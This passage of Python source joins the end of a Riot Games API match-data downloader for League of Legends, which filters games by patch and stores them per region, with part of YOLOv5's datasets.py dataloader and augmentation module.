if not os.path.exists(self.db):
os.makedirs(self.db)
downloadedFile_name = self.region + '.txt'
self.downloadedGamesPath = os.path.join(self.database, 'patches', self.patch, downloadedFile_name)
if os.path.isfile(self.downloadedGamesPath):
with open(self.downloadedGamesPath, 'r') as f:
self.downloadedGames = [x.strip() for x in f.readlines()]
else:
self.downloadedGames = []
self.summonerIDs = []
if os.path.isfile(os.path.join(database, 'player_listing', region, 'players')):
players = pickle.load(open(os.path.join(database, 'player_listing', region, 'players'), 'rb'))
for league in leagues:
self.summonerIDs.extend(players[league])
random.shuffle(self.summonerIDs)
def downloadData(self):
while self.summonerIDs: # if the API is unavailable, or the sumID is unreachable for whatever reason, just skip to the next one
sumID = self.summonerIDs.pop()
try:
accountID = self.api.getData('https://%s.api.riotgames.com/lol/summoner/v4/summoners/%s' % (self.region, sumID))['accountId']
games = \
self.api.getData('https://%s.api.riotgames.com/lol/match/v4/matchlists/by-account/%s' % (self.region, accountID), {'queue': 420})[
'matches']
except ApiError403 as e:
print(e, file=sys.stderr)
return e
except ApiError as e:
print(e, file=sys.stderr)
continue
for game in games: # from most recent to oldest
gameID = str(game['gameId'])
# Already downloaded? This means we are up to date
if gameID in self.downloadedGames:
break
# Wrong timestamp?
timestamp = game['timestamp']
previous_patch = self.patch
previous_patch = previous_patch.split('.')
previous_patch[1] = str(int(previous_patch[1]) - 1)
previous_patch = '.'.join(previous_patch)
if previous_patch in self.timestamped_patches and self.timestamped_patches[previous_patch][1] > timestamp: # game is too old
break # all the next games are too old
next_patch = self.patch
next_patch = next_patch.split('.')
next_patch[1] = str(int(next_patch[1]) + 1)
next_patch = '.'.join(next_patch)
if next_patch in self.timestamped_patches and self.timestamped_patches[next_patch][0] < timestamp: # game is too recent
continue # need to go further
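# Illustrative example: for patch '9.10', previous_patch is '9.9' and next_patch is '9.11';
# a game created before '9.9' was last seen is too old, and one created after '9.11' was
# first seen is too recent to belong to this patch.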
try:
gameData = self.api.getData('https://%s.api.riotgames.com/lol/match/v4/matches/%s' % (self.region, gameID))
except ApiError403 as e:
print(e, file=sys.stderr)
return e
except ApiError404 as e:
print(e, file=sys.stderr)
break
except ApiError as e:
print(e, file=sys.stderr)
continue
# update timestamps: gameData['gameCreation'] == game['timestamp']
gamePatch = '.'.join(gameData['gameVersion'].split('.')[:2])
timestamp = gameData['gameCreation']
if gamePatch not in self.timestamped_patches:
self.timestamped_patches[gamePatch] = [timestamp, timestamp]
else: # first seen and last seen
if self.timestamped_patches[gamePatch][0] > timestamp:
self.timestamped_patches[gamePatch][0] = timestamp
elif self.timestamped_patches[gamePatch][1] < timestamp:
self.timestamped_patches[gamePatch][1] = timestamp
# Game from a different patch?
# formatting both versions so we can compare them
gameVersion = gameData['gameVersion'].split('.')[:2]
gameVersion = tuple(list(map(int, gameVersion)))
patchVersion = tuple(list(map(int, self.patch.split('.'))))
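# e.g. gameVersion '9.4.261.2' becomes (9, 4); comparing tuples of ints avoids the
# string trap where '9.4' > '9.10'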
if gameVersion < patchVersion: # game predates the target patch; everything after it is older still
break
if gameVersion > patchVersion: # game is from a newer patch; need to look further back
continue
# saving game
file_path = os.path.join(self.db, gameID)
try:
pickle.dump(gameData, open(file_path, 'wb'))
except FileNotFoundError as e:
print(e, file=sys.stderr)
time.sleep(1)
continue
self.downloadedGames.append(gameID)
print(self.patch, self.region, gameID)
try:
with open(self.downloadedGamesPath, 'a+') as f:
f.write(gameID + '\n')
except FileNotFoundError as e:
print(e, file=sys.stderr)
time.sleep(1)
continue
return None # No data left to download
def keepDownloading(database, patches, region, leagues, timestamped_patches, attempts=ATTEMPTS):
print('Starting data collection for', region, patches, file=sys.stderr)
for patch in patches:
dd = None
while True:
if not dd:
try:
dd = DataDownloader(database, patch, region, leagues, timestamped_patches)
except ApiError403 as e:
print('FATAL ERROR', patch, region, e, file=sys.stderr)
return
except ApiError as e:
print(e, file=sys.stderr)
attempts -= 1
if attempts <= 0:
print(region, 'initial connection failed. End of connection attempts.', file=sys.stderr)
return
print(region, 'initial connection failed. Retrying in 5 minutes. Attempts left:', attempts, file=sys.stderr)
time.sleep(300)
continue
e = dd.downloadData()
if e is not None:
print('FATAL ERROR', patch, region, e, file=sys.stderr)
return
print(region, patch, 'all games downloaded', file=sys.stderr)
break
print(region, 'download complete')
def saveLastSeen(timestamped_patches, save_interval, end):
cfg = configparser.ConfigParser()
cfg.read('config.ini')
last_save = time.time()
while not end.is_set():
if last_save + save_interval < time.time():
# we save the dictionary
for key, value in timestamped_patches.items():
cfg['PATCHES'][key] = ','.join(list(map(str, value)))
with open('config.ini', 'w') as configfile:
cfg.write(configfile)
print('patch timestamps saved')
last_save = time.time()
time.sleep(1)
# we save the final state of the dictionary
for key, value in timestamped_patches.items():
cfg['PATCHES'][key] = ','.join(list(map(str, value)))
with open('config.ini', 'w') as configfile:
cfg.write(configfile)
print('patch timestamps saved')
def run(mode):
assert isinstance(mode, Base_Mode), 'Unrecognized mode {}'.format(mode)
manager = Manager()
last_seen_from_patch = manager.dict()
endUpdate = manager.Event()
for key, value in mode.config['PATCHES'].items():
last_seen_from_patch[key] = list(map(int, value.split(','))) # first seen and last seen
kdprocs = []
for region in mode.REGIONS:
kdprocs.append(
multiprocessing.Process(target=keepDownloading,
args=(mode.DATABASE, mode.PATCHES_TO_DOWNLOAD, region, mode.LEAGUES, last_seen_from_patch)))
kdprocs[-1].start()
slsproc = multiprocessing.Process(target=saveLastSeen, args=(last_seen_from_patch, 300, endUpdate))
slsproc.start()
for kdproc in kdprocs:
kdproc.join()
endUpdate.set()
slsproc.join()
endUpdate.set()
print('-- Download complete --')
if __name__ == '__main__':
m = Base_Mode()
run(m)
datasets.py
# YOLOv5 🚀 by Ultralytics, GPL-3.0 license
"""
Dataloaders and dataset utils
"""
import glob
import hashlib
import json
import math
import os
import random
import shutil
import time
from itertools import repeat
from multiprocessing.pool import Pool, ThreadPool
from pathlib import Path
from threading import Thread
from urllib.parse import urlparse
from zipfile import ZipFile
import numpy as np
import torch
import torch.nn.functional as F
import yaml
from PIL import ExifTags, Image, ImageOps
from torch.utils.data import DataLoader, Dataset, dataloader, distributed
from tqdm import tqdm
from .augmentations import Albumentations, augment_hsv, copy_paste, letterbox, mixup, random_perspective
from .general import (DATASETS_DIR, LOGGER, NUM_THREADS, check_dataset, check_requirements, check_yaml, clean_str,
cv2, segments2boxes, xyn2xy, xywh2xyxy, xywhn2xyxy, xyxy2xywhn)
from .torch_utils import torch_distributed_zero_first
# Parameters
HELP_URL = 'https://github.com/ultralytics/yolov5/wiki/Train-Custom-Data'
IMG_FORMATS = 'bmp', 'dng', 'jpeg', 'jpg', 'mpo', 'png', 'tif', 'tiff', 'webp' # include image suffixes
VID_FORMATS = 'asf', 'avi', 'gif', 'm4v', 'mkv', 'mov', 'mp4', 'mpeg', 'mpg', 'ts', 'wmv' # include video suffixes
BAR_FORMAT = '{l_bar}{bar:10}{r_bar}{bar:-10b}' # tqdm bar format
# Get orientation exif tag
for orientation in ExifTags.TAGS.keys():
if ExifTags.TAGS[orientation] == 'Orientation':
break
def get_hash(paths):
# Returns a single hash value of a list of paths (files or dirs)
size = sum(os.path.getsize(p) for p in paths if os.path.exists(p)) # sizes
h = hashlib.md5(str(size).encode()) # hash sizes
h.update(''.join(paths).encode()) # hash paths
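# hashing the total size plus the concatenated paths is a cheap way to detect that the
# image/label set changed and a stale *.cache file must be rebuilt (checked further below)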
return h.hexdigest() # return hash
def exif_size(img):
# Returns exif-corrected PIL size
s = img.size # (width, height)
try:
rotation = dict(img._getexif().items())[orientation]
if rotation == 6: # rotation 270
s = (s[1], s[0])
elif rotation == 8: # rotation 90
s = (s[1], s[0])
except Exception:
pass
return s
def exif_transpose(image):
"""
Transpose a PIL image accordingly if it has an EXIF Orientation tag.
Inplace version of https://github.com/python-pillow/Pillow/blob/master/src/PIL/ImageOps.py exif_transpose()
:param image: The image to transpose.
:return: An image.
"""
exif = image.getexif()
orientation = exif.get(0x0112, 1) # default 1
if orientation > 1:
method = {2: Image.FLIP_LEFT_RIGHT,
3: Image.ROTATE_180,
4: Image.FLIP_TOP_BOTTOM,
5: Image.TRANSPOSE,
6: Image.ROTATE_270,
7: Image.TRANSVERSE,
8: Image.ROTATE_90,
}.get(orientation)
if method is not None:
image = image.transpose(method)
del exif[0x0112]
image.info["exif"] = exif.tobytes()
return image
def create_dataloader(path, imgsz, batch_size, stride, single_cls=False, hyp=None, augment=False, cache=False, pad=0.0,
rect=False, rank=-1, workers=8, image_weights=False, quad=False, prefix='', shuffle=False):
if rect and shuffle:
LOGGER.warning('WARNING: --rect is incompatible with DataLoader shuffle, setting shuffle=False')
shuffle = False
with torch_distributed_zero_first(rank): # init dataset *.cache only once if DDP
dataset = LoadImagesAndLabels(path, imgsz, batch_size,
augment=augment, # augmentation
hyp=hyp, # hyperparameters
rect=rect, # rectangular batches
cache_images=cache,
single_cls=single_cls,
stride=int(stride),
pad=pad,
image_weights=image_weights,
prefix=prefix)
batch_size = min(batch_size, len(dataset))
nd = torch.cuda.device_count() # number of CUDA devices
nw = min([os.cpu_count() // max(nd, 1), batch_size if batch_size > 1 else 0, workers]) # number of workers
sampler = None if rank == -1 else distributed.DistributedSampler(dataset, shuffle=shuffle)
loader = DataLoader if image_weights else InfiniteDataLoader # only DataLoader allows for attribute updates
return loader(dataset,
batch_size=batch_size,
shuffle=shuffle and sampler is None,
num_workers=nw,
sampler=sampler,
pin_memory=True,
collate_fn=LoadImagesAndLabels.collate_fn4 if quad else LoadImagesAndLabels.collate_fn), dataset
class InfiniteDataLoader(dataloader.DataLoader):
""" Dataloader that reuses workers
Uses same syntax as vanilla DataLoader
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
object.__setattr__(self, 'batch_sampler', _RepeatSampler(self.batch_sampler))
self.iterator = super().__iter__()
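# Wrapping batch_sampler in _RepeatSampler and creating the iterator once means the
# worker processes persist across epochs instead of being torn down and re-spawned.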
def __len__(self):
return len(self.batch_sampler.sampler)
def __iter__(self):
for i in range(len(self)):
yield next(self.iterator)
class _RepeatSampler:
""" Sampler that repeats forever
Args:
sampler (Sampler)
"""
def __init__(self, sampler):
self.sampler = sampler
def __iter__(self):
while True:
yield from iter(self.sampler)
class LoadImages:
# YOLOv5 image/video dataloader, i.e. `python detect.py --source image.jpg/vid.mp4`
def __init__(self, path, img_size=640, stride=32, auto=True):
p = str(Path(path).resolve()) # os-agnostic absolute path
if '*' in p:
files = sorted(glob.glob(p, recursive=True)) # glob
elif os.path.isdir(p):
files = sorted(glob.glob(os.path.join(p, '*.*'))) # dir
elif os.path.isfile(p):
files = [p] # files
else:
raise Exception(f'ERROR: {p} does not exist')
images = [x for x in files if x.split('.')[-1].lower() in IMG_FORMATS]
videos = [x for x in files if x.split('.')[-1].lower() in VID_FORMATS]
ni, nv = len(images), len(videos)
self.img_size = img_size
self.stride = stride
self.files = images + videos
self.nf = ni + nv # number of files
self.video_flag = [False] * ni + [True] * nv
self.mode = 'image'
self.auto = auto
if any(videos):
self.new_video(videos[0]) # new video
else:
self.cap = None
assert self.nf > 0, f'No images or videos found in {p}. ' \
f'Supported formats are:\nimages: {IMG_FORMATS}\nvideos: {VID_FORMATS}'
def __iter__(self):
self.count = 0
return self
def __next__(self):
if self.count == self.nf:
raise StopIteration
path = self.files[self.count]
if self.video_flag[self.count]:
# Read video
self.mode = 'video'
ret_val, img0 = self.cap.read()
while not ret_val:
self.count += 1
self.cap.release()
if self.count == self.nf: # last video
raise StopIteration
else:
path = self.files[self.count]
self.new_video(path)
ret_val, img0 = self.cap.read()
self.frame += 1
s = f'video {self.count + 1}/{self.nf} ({self.frame}/{self.frames}) {path}: '
else:
# Read image
self.count += 1
img0 = cv2.imread(path) # BGR
assert img0 is not None, f'Image Not Found {path}'
s = f'image {self.count}/{self.nf} {path}: '
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride, auto=self.auto)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return path, img, img0, self.cap, s
def new_video(self, path):
self.frame = 0
self.cap = cv2.VideoCapture(path)
self.frames = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.nf # number of files
class LoadWebcam: # for inference
# YOLOv5 local webcam dataloader, i.e. `python detect.py --source 0`
def __init__(self, pipe='0', img_size=640, stride=32):
self.img_size = img_size
self.stride = stride
self.pipe = eval(pipe) if pipe.isnumeric() else pipe
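# a numeric source such as '0' becomes the integer camera index 0, so cv2.VideoCapture
# opens the local webcam instead of treating it as a file path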
self.cap = cv2.VideoCapture(self.pipe) # video capture object
self.cap.set(cv2.CAP_PROP_BUFFERSIZE, 3) # set buffer size
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if cv2.waitKey(1) == ord('q'): # q to quit
self.cap.release()
cv2.destroyAllWindows()
raise StopIteration
# Read frame
ret_val, img0 = self.cap.read()
img0 = cv2.flip(img0, 1) # flip left-right
# Print
assert ret_val, f'Camera Error {self.pipe}'
img_path = 'webcam.jpg'
s = f'webcam {self.count}: '
# Padded resize
img = letterbox(img0, self.img_size, stride=self.stride)[0]
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return img_path, img, img0, None, s
def __len__(self):
return 0
class LoadStreams:
# YOLOv5 streamloader, i.e. `python detect.py --source 'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP streams`
def __init__(self, sources='streams.txt', img_size=640, stride=32, auto=True):
self.mode = 'stream'
self.img_size = img_size
self.stride = stride
if os.path.isfile(sources):
with open(sources) as f:
sources = [x.strip() for x in f.read().strip().splitlines() if len(x.strip())]
else:
sources = [sources]
n = len(sources)
self.imgs, self.fps, self.frames, self.threads = [None] * n, [0] * n, [0] * n, [None] * n
self.sources = [clean_str(x) for x in sources] # clean source names for later
self.auto = auto
for i, s in enumerate(sources): # index, source
# Start thread to read frames from video stream
st = f'{i + 1}/{n}: {s}... '
if urlparse(s).hostname in ('youtube.com', 'youtu.be'): # if source is YouTube video
check_requirements(('pafy', 'youtube_dl==2020.12.2'))
import pafy
s = pafy.new(s).getbest(preftype="mp4").url # YouTube URL
s = eval(s) if s.isnumeric() else s # i.e. s = '0' local webcam
cap = cv2.VideoCapture(s)
assert cap.isOpened(), f'{st}Failed to open {s}'
w = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
h = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
fps = cap.get(cv2.CAP_PROP_FPS) # warning: may return 0 or nan
self.frames[i] = max(int(cap.get(cv2.CAP_PROP_FRAME_COUNT)), 0) or float('inf') # infinite stream fallback
self.fps[i] = max((fps if math.isfinite(fps) else 0) % 100, 0) or 30 # 30 FPS fallback
_, self.imgs[i] = cap.read() # guarantee first frame
self.threads[i] = Thread(target=self.update, args=([i, cap, s]), daemon=True)
LOGGER.info(f"{st} Success ({self.frames[i]} frames {w}x{h} at {self.fps[i]:.2f} FPS)")
self.threads[i].start()
LOGGER.info('') # newline
# check for common shapes
s = np.stack([letterbox(x, self.img_size, stride=self.stride, auto=self.auto)[0].shape for x in self.imgs])
self.rect = np.unique(s, axis=0).shape[0] == 1 # rect inference if all shapes equal
if not self.rect:
LOGGER.warning('WARNING: Stream shapes differ. For optimal performance supply similarly-shaped streams.')
def update(self, i, cap, stream):
# Read stream `i` frames in daemon thread
n, f, read = 0, self.frames[i], 1 # frame number, total frames, read every 'read'-th frame
while cap.isOpened() and n < f:
n += 1
# _, self.imgs[index] = cap.read()
cap.grab()
if n % read == 0:
success, im = cap.retrieve()
if success:
self.imgs[i] = im
else:
LOGGER.warning('WARNING: Video stream unresponsive, please check your IP camera connection.')
self.imgs[i] = np.zeros_like(self.imgs[i])
cap.open(stream) # re-open stream if signal was lost
time.sleep(1 / self.fps[i]) # wait time
def __iter__(self):
self.count = -1
return self
def __next__(self):
self.count += 1
if not all(x.is_alive() for x in self.threads) or cv2.waitKey(1) == ord('q'): # q to quit
cv2.destroyAllWindows()
raise StopIteration
# Letterbox
img0 = self.imgs.copy()
img = [letterbox(x, self.img_size, stride=self.stride, auto=self.rect and self.auto)[0] for x in img0]
# Stack
img = np.stack(img, 0)
# Convert
img = img[..., ::-1].transpose((0, 3, 1, 2)) # BGR to RGB, BHWC to BCHW
img = np.ascontiguousarray(img)
return self.sources, img, img0, None, ''
def __len__(self):
return len(self.sources) # 1E12 frames = 32 streams at 30 FPS for 30 years
def img2label_paths(img_paths):
# Define label paths as a function of image paths
sa, sb = os.sep + 'images' + os.sep, os.sep + 'labels' + os.sep # /images/, /labels/ substrings
return [sb.join(x.rsplit(sa, 1)).rsplit('.', 1)[0] + '.txt' for x in img_paths]
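# Illustrative example: '/data/images/train/0001.jpg' -> '/data/labels/train/0001.txt';
# only the last '/images/' component is swapped, thanks to rsplit(..., 1)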
class LoadImagesAndLabels(Dataset):
# YOLOv5 train_loader/val_loader, loads images and labels for training and validation
cache_version = 0.6 # dataset labels *.cache version
def __init__(self, path, img_size=640, batch_size=16, augment=False, hyp=None, rect=False, image_weights=False,
cache_images=False, single_cls=False, stride=32, pad=0.0, prefix=''):
self.img_size = img_size
self.augment = augment
self.hyp = hyp
self.image_weights = image_weights
self.rect = False if image_weights else rect
self.mosaic = self.augment and not self.rect # load 4 images at a time into a mosaic (only during training)
self.mosaic_border = [-img_size // 2, -img_size // 2]
self.stride = stride
self.path = path
self.albumentations = Albumentations() if augment else None
try:
f = [] # image files
for p in path if isinstance(path, list) else [path]:
p = Path(p) # os-agnostic
if p.is_dir(): # dir
f += glob.glob(str(p / '**' / '*.*'), recursive=True)
# f = list(p.rglob('*.*')) # pathlib
elif p.is_file(): # file
with open(p) as t:
t = t.read().strip().splitlines()
parent = str(p.parent) + os.sep
f += [x.replace('./', parent) if x.startswith('./') else x for x in t] # local to global path
# f += [p.parent / x.lstrip(os.sep) for x in t] # local to global path (pathlib)
else:
raise Exception(f'{prefix}{p} does not exist')
self.im_files = sorted(x.replace('/', os.sep) for x in f if x.split('.')[-1].lower() in IMG_FORMATS)
# self.img_files = sorted([x for x in f if x.suffix[1:].lower() in IMG_FORMATS]) # pathlib
assert self.im_files, f'{prefix}No images found'
except Exception as e:
raise Exception(f'{prefix}Error loading data from {path}: {e}\nSee {HELP_URL}')
# Check cache
self.label_files = img2label_paths(self.im_files) # labels
cache_path = (p if p.is_file() else Path(self.label_files[0]).parent).with_suffix('.cache')
try:
cache, exists = np.load(cache_path, allow_pickle=True).item(), True # load dict
assert cache['version'] == self.cache_version # same version
assert cache['hash'] == get_hash(self.label_files + self.im_files) # same hash
except Exception:
cache, exists = self.cache_labels(cache_path, prefix), False # cache
# Display cache
nf, nm, ne, nc, n = cache.pop('results') # found, missing, empty, corrupt, total
if exists:
d = f"Scanning '{cache_path}' images and labels... {nf} found, {nm} missing, {ne} empty, {nc} corrupt"
tqdm(None, desc=prefix + d, total=n, initial=n, bar_format=BAR_FORMAT) # display cache results
if cache['msgs']:
LOGGER.info('\n'.join(cache['msgs'])) # display warnings
assert nf > 0 or not augment, f'{prefix}No labels in {cache_path}. Can not train without labels. See {HELP_URL}'
# Read cache
[cache.pop(k) for k in ('hash', 'version', 'msgs')] # remove items
labels, shapes, self.segments = zip(*cache.values())
self.labels = list(labels)
self.shapes = np.array(shapes, dtype=np.float64)
self.im_files = list(cache.keys()) # update
self.label_files = img2label_paths(cache.keys()) # update
n = len(shapes) # number of images
bi = np.floor(np.arange(n) / batch_size).astype(np.int) # batch index
nb = bi[-1] + 1 # number of batches
self.batch = bi # batch index of image
self.n = n
self.indices = range(n)
# Update labels
include_class = [] # filter labels to include only these classes (optional)
include_class_array = np.array(include_class).reshape(1, -1)
for i, (label, segment) in enumerate(zip(self.labels, self.segments)):
if include_class:
j = (label[:, 0:1] == include_class_array).any(1)
self.labels[i] = label[j]
if segment:
self.segments[i] = segment[j]
if single_cls: # single-class training, merge all classes into 0
self.labels[i][:, 0] = 0
if segment:
self.segments[i][:, 0] = 0
# Rectangular Training
if self.rect:
# Sort by aspect ratio
s = self.shapes # wh
ar = s[:, 1] / s[:, 0] # aspect ratio
irect = ar.argsort()
self.im_files = [self.im_files[i] for i in irect]
self.label_files = [self.label_files[i] for i in irect]
self.labels = [self.labels[i] for i in irect]
self.shapes = s[irect] # wh
ar = ar[irect]
# Set training image shapes
shapes = [[1, 1]] * nb
for i in range(nb):
ari = ar[bi == i]
mini, maxi = ari.min(), ari.max()
if maxi < 1:
shapes[i] = [maxi, 1]
elif mini > 1:
shapes[i] = [1, 1 / mini]
self.batch_shapes = np.ceil(np.array(shapes) * img_size / stride + pad).astype(np.int) * stride
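# batch shapes are rounded up to a multiple of `stride`; e.g. with img_size 640 and
# stride 32, a side factor of 0.75 letterboxes that batch to 640x480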
# Cache images into RAM/disk for faster training (WARNING: large datasets may exceed system resources)
self.ims = [None] * n
self.npy_files = [Path(f).with_suffix('.npy') for f in self.im_files]
if cache_images:
gb = 0 # Gigabytes of cached images
self.im_hw0, self.im_hw = [None] * n, [None] * n
fcn = self.cache_images_to_disk if cache_images == 'disk' else self.load_image
results = ThreadPool(NUM_THREADS).imap(fcn, range(n))
pbar = tqdm(enumerate(results), total=n, bar_format=BAR_FORMAT)
for i, x in pbar:
if cache_images == 'disk':
gb += self.npy_files[i].stat().st_size
else: # 'ram'
self.ims[i], self.im_hw0[i], self.im_hw[i] = x # im, hw_orig, hw_resized = load_image(self, i)
gb += self.ims[i].nbytes
pbar.desc = f'{prefix}Caching images ({gb / 1E9:.1f}GB {cache_images})'
pbar.close()
def cache_labels(self, path=Path('./labels.cache'), prefix=''):
# Cache dataset labels, check images and read shapes
x = {} # dict
nm, nf, ne, nc, msgs = 0, 0, 0, 0, [] # number missing, found, empty, corrupt, messages
desc = f"{prefix}Scanning '{path.parent / path.stem}' images and labels..."
with Pool(NUM_THREADS) as pool:
pbar = tqdm(pool.imap(verify_image_label, zip(self.im_files, self.label_files, repeat(prefix))),
desc=desc, total=len(self.im_files), bar_format=BAR_FORMAT)
for im_file, lb, shape, segments, nm_f, nf_f, ne_f, nc_f, msg in pbar:
nm += nm_f
nf += nf_f
ne += ne_f
nc += nc_f
if im_file:
x[im_file] = [lb, shape, segments]
if msg:
msgs.append(msg)
pbar.desc = f"{desc}{nf} found, {nm} missing, {ne} empty, {nc} corrupt"
pbar.close()
if msgs:
LOGGER.info('\n'.join(msgs))
if nf == 0:
LOGGER.warning(f'{prefix}WARNING: No labels found in {path}. See {HELP_URL}')
x['hash'] = get_hash(self.label_files + self.im_files)
x['results'] = nf, nm, ne, nc, len(self.im_files)
x['msgs'] = msgs # warnings
x['version'] = self.cache_version # cache version
try:
np.save(path, x) # save cache for next time
path.with_suffix('.cache.npy').rename(path) # remove .npy suffix
LOGGER.info(f'{prefix}New cache created: {path}')
except Exception as e:
LOGGER.warning(f'{prefix}WARNING: Cache directory {path.parent} is not writeable: {e}') # not writeable
return x
def __len__(self):
return len(self.im_files)
# def __iter__(self):
# self.count = -1
# print('ran dataset iter')
# #self.shuffled_vector = np.random.permutation(self.nF) if self.augment else np.arange(self.nF)
# return self
def __getitem__(self, index):
index = self.indices[index] # linear, shuffled, or image_weights
hyp = self.hyp
mosaic = self.mosaic and random.random() < hyp['mosaic']
if mosaic:
# Load mosaic
img, labels = self.load_mosaic(index)
shapes = None
# MixUp augmentation
if random.random() < hyp['mixup']:
img, labels = mixup(img, labels, *self.load_mosaic(random.randint(0, self.n - 1)))
else:
# Load image
img, (h0, w0), (h, w) = self.load_image(index)
# Letterbox
shape = self.batch_shapes[self.batch[index]] if self.rect else self.img_size # final letterboxed shape
img, ratio, pad = letterbox(img, shape, auto=False, scaleup=self.augment)
shapes = (h0, w0), ((h / h0, w / w0), pad) # for COCO mAP rescaling
labels = self.labels[index].copy()
if labels.size: # normalized xywh to pixel xyxy format
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], ratio[0] * w, ratio[1] * h, padw=pad[0], padh=pad[1])
if self.augment:
img, labels = random_perspective(img, labels,
degrees=hyp['degrees'],
translate=hyp['translate'],
scale=hyp['scale'],
shear=hyp['shear'],
perspective=hyp['perspective'])
nl = len(labels) # number of labels
if nl:
labels[:, 1:5] = xyxy2xywhn(labels[:, 1:5], w=img.shape[1], h=img.shape[0], clip=True, eps=1E-3)
if self.augment:
# Albumentations
img, labels = self.albumentations(img, labels)
nl = len(labels) # update after albumentations
# HSV color-space
augment_hsv(img, hgain=hyp['hsv_h'], sgain=hyp['hsv_s'], vgain=hyp['hsv_v'])
# Flip up-down
if random.random() < hyp['flipud']:
img = np.flipud(img)
if nl:
labels[:, 2] = 1 - labels[:, 2]
# Flip left-right
if random.random() < hyp['fliplr']:
img = np.fliplr(img)
if nl:
labels[:, 1] = 1 - labels[:, 1]
# Cutouts
# labels = cutout(img, labels, p=0.5)
# nl = len(labels) # update after cutout
labels_out = torch.zeros((nl, 6))
if nl:
labels_out[:, 1:] = torch.from_numpy(labels)
# Convert
img = img.transpose((2, 0, 1))[::-1] # HWC to CHW, BGR to RGB
img = np.ascontiguousarray(img)
return torch.from_numpy(img), labels_out, self.im_files[index], shapes
def load_image(self, i):
# Loads 1 image from dataset index 'i', returns (im, original hw, resized hw)
im, f, fn = self.ims[i], self.im_files[i], self.npy_files[i],
if im is None: # not cached in RAM
if fn.exists(): # load npy
im = np.load(fn)
else: # read image
im = cv2.imread(f) # BGR
assert im is not None, f'Image Not Found {f}'
h0, w0 = im.shape[:2] # orig hw
r = self.img_size / max(h0, w0) # ratio
if r != 1: # if sizes are not equal
im = cv2.resize(im,
(int(w0 * r), int(h0 * r)),
interpolation=cv2.INTER_LINEAR if (self.augment or r > 1) else cv2.INTER_AREA)
return im, (h0, w0), im.shape[:2] # im, hw_original, hw_resized
else:
return self.ims[i], self.im_hw0[i], self.im_hw[i] # im, hw_original, hw_resized
def cache_images_to_disk(self, i):
# Saves an image as an *.npy file for faster loading
f = self.npy_files[i]
if not f.exists():
np.save(f.as_posix(), cv2.imread(self.im_files[i]))
def load_mosaic(self, index):
# YOLOv5 4-mosaic loader. Loads 1 image + 3 random images into a 4-image mosaic
labels4, segments4 = [], []
s = self.img_size
yc, xc = (int(random.uniform(-x, 2 * s + x)) for x in self.mosaic_border) # mosaic center x, y
indices = [index] + random.choices(self.indices, k=3) # 3 additional image indices
random.shuffle(indices)
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = self.load_image(index)
# place img in img4
if i == 0: # top left
img4 = np.full((s * 2, s * 2, img.shape[2]), 114, dtype=np.uint8) # base image with 4 tiles
x1a, y1a, x2a, y2a = max(xc - w, 0), max(yc - h, 0), xc, yc # xmin, ymin, xmax, ymax (large image)
x1b, y1b, x2b, y2b = w - (x2a - x1a), h - (y2a - y1a), w, h # xmin, ymin, xmax, ymax (small image)
elif i == 1: # top right
x1a, y1a, x2a, y2a = xc, max(yc - h, 0), min(xc + w, s * 2), yc
x1b, y1b, x2b, y2b = 0, h - (y2a - y1a), min(w, x2a - x1a), h
elif i == 2: # bottom left
x1a, y1a, x2a, y2a = max(xc - w, 0), yc, xc, min(s * 2, yc + h)
x1b, y1b, x2b, y2b = w - (x2a - x1a), 0, w, min(y2a - y1a, h)
elif i == 3: # bottom right
x1a, y1a, x2a, y2a = xc, yc, min(xc + w, s * 2), min(s * 2, yc + h)
x1b, y1b, x2b, y2b = 0, 0, min(w, x2a - x1a), min(y2a - y1a, h)
img4[y1a:y2a, x1a:x2a] = img[y1b:y2b, x1b:x2b] # img4[ymin:ymax, xmin:xmax]
padw = x1a - x1b
padh = y1a - y1b
# Labels
labels, segments = self.labels[index].copy(), self.segments[index].copy()
if labels.size:
labels[:, 1:] = xywhn2xyxy(labels[:, 1:], w, h, padw, padh) # normalized xywh to pixel xyxy format
segments = [xyn2xy(x, w, h, padw, padh) for x in segments]
labels4.append(labels)
segments4.extend(segments)
# Concat/clip labels
labels4 = np.concatenate(labels4, 0)
for x in (labels4[:, 1:], *segments4):
np.clip(x, 0, 2 * s, out=x) # clip when using random_perspective()
# img4, labels4 = replicate(img4, labels4) # replicate
# Augment
img4, labels4, segments4 = copy_paste(img4, labels4, segments4, p=self.hyp['copy_paste'])
img4, labels4 = random_perspective(img4, labels4, segments4,
degrees=self.hyp['degrees'],
translate=self.hyp['translate'],
scale=self.hyp['scale'],
shear=self.hyp['shear'],
perspective=self.hyp['perspective'],
border=self.mosaic_border) # border to remove
return img4, labels4
def load_mosaic9(self, index):
# YOLOv5 9-mosaic loader. Loads 1 image + 8 random images into a 9-image mosaic
labels9, segments9 = [], []
s = self.img_size
indices = [index] + random.choices(self.indices, k=8) # 8 additional image indices
random.shuffle(indices)
hp, wp = -1, -1 # height, width previous
for i, index in enumerate(indices):
# Load image
img, _, (h, w) = self.load_image(index)
# place img in img9
if i == 0: # center
                img9 = np.full((s * 3, s * 3, img.shape[2]), 114, dtype=np.uint8)  # base image with 9 tiles
h0, w0 = h, w
c = s, s, s + w, s + h # xmin, ymin, xmax, ymax (base) coordinates
elif i == 1: # top
c = s, s - h, s + w, s
elif i == 2: # top right
c = s + wp, s - h, s + wp + w, s
elif i == 3: # right
c = s + w0, s, s + w0 + w, s + h
elif i == 4: # bottom right
c = s + w0, s + hp, s + w0 + w, s + hp + h
elif i == 5: # bottom
c = s + w0 - w, s + h0, s + w0, s + h0 + h
elif i == 6: # bottom left
c = s + w0 - wp - w, s + h0, s + w0 - wp, s + h0 + h
elif i == 7: # left
c = s - w, s + h0 - h, s, s + h0
elif i == 8: # top left
c = s - w, s + h0 - hp - h, s, s + h0 - hp
padx, pady = c[:2]
x1, y1, x2, y2 = (max(x, 0) for x in c) # allocate coords
# Labels
